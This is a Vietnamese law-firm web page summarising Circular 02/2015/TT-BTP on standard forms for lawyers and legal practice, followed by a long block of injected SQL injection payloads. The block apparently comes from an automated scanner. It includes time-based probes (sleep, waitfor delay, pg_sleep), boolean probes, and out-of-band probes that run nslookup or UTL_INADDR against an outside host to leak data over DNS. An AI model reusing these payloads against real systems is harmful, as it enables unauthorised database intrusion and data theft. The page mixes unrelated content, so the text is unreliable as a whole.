Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Quy định một số mẫu giấy tờ về luật sư và hành nghề luật sư

Cập nhật lần cuối lúc 08:00 ngày 12/02/2015

Bộ Tư pháp vừa ban hành Thông tư số 02/2015/TT-BTP  ngày 16 tháng 01 năm 2015 quy định một số mẫu giấy tờ về luật sư và hành nghề luật sư.

Theo đó, đối tượng áp dụng tại Thông tư là người đề nghị cấp Chứng chỉ hành nghề luật sư; luật sư Việt Nam; luật sư nước ngoài đề nghị cấp Giấy phép hành nghề tại Việt Nam; người nộp hồ sơ đăng ký hoạt động tổ chức hành nghề luật sư/chi nhánh tổ chức hành nghề luật sư Việt Nam; người nộp hồ sơ thành lập chi nhánh/công ty luật nước ngoài, đăng ký hoạt động của chi nhánh/công ty luật nước ngoài; tổ chức hành nghề luật sư Việt Nam; tổ chức hành nghề luật sư nước ngoài tại Việt Nam; cơ quan quản lý nhà nước về luật sư và hành nghề luật sư.

Thông tư đã ban hành 22 mẫu giấy tờ thay vì 29 mẫu giấy tờ như Thông tư 17/2011/TT-BTP.

Cách thức đánh số Giấy đăng ký hoạt động của tổ chức hành nghề luật sư, đăng ký hành nghề luật sư với tư cách cá nhân được thực hiện theo Điều 6 của Thông tư số 17/2011/TT-BTP ngày 14/10/2011 của Bộ trưởng Bộ Tư pháp hướng dẫn một số quy định của Luật Luật sư, Nghị định quy định chi tiết và hướng dẫn thi hành một số điều của Luật Luật sư, Nghị định hướng dẫn thi hành các quy định của Luật Luật sư về tổ chức xã hội - nghề nghiệp của luật sư.

Các mẫu giấy tờ quy định tại Thông tư này được đăng tải trên Cổng thông tin điện tử của Bộ Tư pháp. Các cá nhân, tổ chức truy cập vào cổng thông tin điện tử của Bộ Tư pháp (www.moj.gov.vn/bttp) để in và sử dụng các mẫu giấy tờ này.

Thông tư này có hiệu lực thi hành kể từ ngày 05 tháng 3 năm 2015. Các giấy tờ theo mẫu quy định tại Thông tư số 17/2011/TT-BTP được cấp trước ngày Thông tư này có hiệu lực thi hành vẫn có giá trị pháp lý.

Tag : ,
if(now()=sysdate(),sleep(9.984),0)/*'XOR(if(now()=sysdate(),sleep(9.984),0))OR'"XOR(if(now()=sysdate(),sleep(9.984),0))OR"*/
(select(0)from(select(sleep(3.328)))v)/*'+(select(0)from(select(sleep(3.328)))v)+'"+(select(0)from(select(sleep(3.328)))v)+"*/
-1; waitfor delay '0:0:3.328' --
-1); waitfor delay '0:0:6.656' --
1 waitfor delay '0:0:6.656' --
vYuxgGQr'; waitfor delay '0:0:6.656' --
-1;select pg_sleep(6.656); --
-1);select pg_sleep(9.984); --
-1));select pg_sleep(9.984); --
Onm72sml';select pg_sleep(3.328); --
msOf9wSg');select pg_sleep(3.328); --
8wDTq2UB');select pg_sleep(6.656); --
jnbZ3oM0'));select pg_sleep(9.984); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3726.34060.5e58b.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3728.34060.5e58b.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-3730.34060.5e58b.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-3732.34060.5e58b.\1.bxss.me
679'
-1" OR 2+679-679-1=0+0+0+1 --
-1" OR 3+679-679-1=0+0+0+1 --
1
1
-1 OR 2+949-949-1=0+0+0+1 --
-1 OR 3+949-949-1=0+0+0+1 --
-1 OR 3*2<(0+5+949-949) --
1'"
-1 OR 3*2>(0+5+949-949) --
-1 OR 2+806-806-1=0+0+0+1
\
1
@@sUC9T
-1 OR 3+806-806-1=0+0+0+1
JyI=
-1 OR 3*2<(0+5+806-806)
-1 OR 3*2>(0+5+806-806)
-1' OR 2+583-583-1=0+0+0+1 --
-1' OR 3+583-583-1=0+0+0+1 --
-1' OR 3*2<(0+5+583-583) --
-1' OR 3*2>(0+5+583-583) --
-1' OR 2+955-955-1=0+0+0+1 or 'Uc5uOeCj'='
-1' OR 3+955-955-1=0+0+0+1 or 'Uc5uOeCj'='
-1' OR 3*2<(0+5+955-955) or 'Uc5uOeCj'='
1
-1' OR 3*2>(0+5+955-955) or 'Uc5uOeCj'='
-1" OR 3*2<(0+5+679-679) --
-1" OR 3*2>(0+5+679-679) --

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: